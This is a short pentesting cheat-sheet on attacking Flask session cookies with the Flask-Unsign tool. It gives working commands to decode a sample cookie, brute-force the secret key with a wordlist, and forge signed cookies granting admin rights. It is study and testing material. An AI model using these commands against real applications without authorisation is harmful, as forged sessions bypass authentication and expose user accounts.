🍶flask

Flask - Pentesting

Flask-Unsign

Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

Install Flask-Unsign

pip3 install flask-unsign

flask-unsign --decode --cookie 'eyJhZG1pbiI6ImZhbHNlIiwidXNlcm5hbWUiOiJndWVzdCJ9.Zd98ww.LHoD42lYOhmgGcBy-6t1v8Kh1jI'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJhZG1pbiI6ImZhbHNlIiwidXNlcm5hbWUiOiJndWVzdCJ9.Zd98ww.LHoD42lYOhmgGcBy-6t1v8Kh1jI' --no-literal-eval

Signing

flask-unsign --sign --cookie "{'admin': 'true', 'username': 'admin'}" --secret 's3cr3t'

Signing Using Legacy (Old Versions)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

References

HackTricks Book
RipSession
Online Decoder

Previousfile upload vulnerability Nextidor

Last updated 9 months ago

Flask - Pentesting

Flask-Unsign

Install Flask-Unsign

Decode Cookie

Brute Force

Signing

Signing Using Legacy (Old Versions)

References